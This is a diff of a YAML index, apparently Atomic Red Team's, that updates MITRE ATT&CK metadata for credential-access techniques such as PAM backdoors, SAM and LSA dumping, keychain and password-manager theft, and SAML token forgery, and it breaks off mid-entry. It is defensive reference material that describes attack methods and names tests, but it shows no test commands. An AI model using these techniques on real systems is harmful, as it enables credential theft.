       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -51770,20 +52395,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests:
     - name: Malicious PAM rule
@@ -51985,7 +52647,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -52199,7 +52860,7 @@ credential-access:
           '
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -52228,6 +52889,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -52239,18 +52901,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -52277,9 +52939,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests:
     - name: SUDO Brute Force - Debian
@@ -52412,7 +53071,7 @@ credential-access:
           '
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -52536,12 +53195,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -52556,10 +53214,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -52567,14 +53226,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -52617,14 +53276,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -52679,14 +53335,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -52737,14 +53392,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -52778,8 +53432,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -52796,11 +53450,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -52818,7 +53471,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -52835,10 +53488,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -52862,46 +53515,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -52922,65 +53541,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -52989,6 +53605,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -52996,31 +53615,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -53033,14 +53684,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -53081,14 +53732,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -53151,7 +53799,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests:
     - name: Dump individual process memory with sh (Local)
@@ -53367,76 +54014,75 @@ credential-access:
         elevation_required: true
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
